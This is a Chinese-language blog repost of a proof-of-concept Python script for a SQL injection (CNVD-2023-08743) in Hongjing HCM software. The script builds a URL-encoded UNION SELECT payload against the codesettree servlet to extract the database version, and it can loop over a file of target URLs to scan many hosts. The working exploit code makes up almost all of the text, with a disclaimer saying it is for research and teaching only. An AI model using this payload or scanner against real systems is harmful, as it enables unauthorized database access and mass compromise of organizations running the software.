模样:
检测:
POC
#!/usr/bin/env python
# -*- conding:utf-8 -*-
# 宏景HCM categories SQL注入 (CNVD-2023-08743)
import requests
import argparse
import sys
import urllib3
urllib3.disable_warnings()
def title():
print("""
_____ _ _ __ __ _____ ___ ___ ___ ____ ___ ___ ______ _ _ ____
/ ____|| \ | |\ \ / /| __ \ |__ \ / _ \ |__ \ |___ \ / _ \ / _ \ |____ || || | |___ \
| | | \| | \ \ / / | | | | ______ ) || | | | ) | __) | ______ | | | || (_) | / / | || |_ __) |
| | | . ` | \ \/ / | | | ||______| / / | | | | / / |__ < |______|| | | | > _ < / / |__ _| |__ <
| |____ | |\ | \ / | |__| | / /_ | |_| | / /_ ___) | | |_| || (_) | / / | | ___) |
\_____||_| \_| \/ |_____/ |____| \___/ |____||____/ \___/ \___/ /_/ |_| |____/
Author:Henry4E36
""")
class information(object):
def __init__(self, args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
payload = self.url + "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories="
# 查询数据库版本
sql = "~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
}
try:
res = requests.get(url=payload+sql, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and "hellohongjingHcm" in res.text and "Microsoft SQL Server" in res.text:
print(res.text)
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在SQL注入!\033[0m")
print("[" + "-" * 100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在SQL注入!")
print("[" + "-" * 100 + "]")
except Exception as e:
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-" * 100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if __name__ == "__main__":
title()
parser = ar = argparse.ArgumentParser(description='宏景HCM categories SQL注入')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 CNVD-2023-08743.py -u http://127.0.0.1\neg2:>>>python3 CNVD-2023-08743.py -f ip.txt")
elif args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
原文始发于微信公众号(Enginge):宏景 HCM CNVD-2023-08743 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论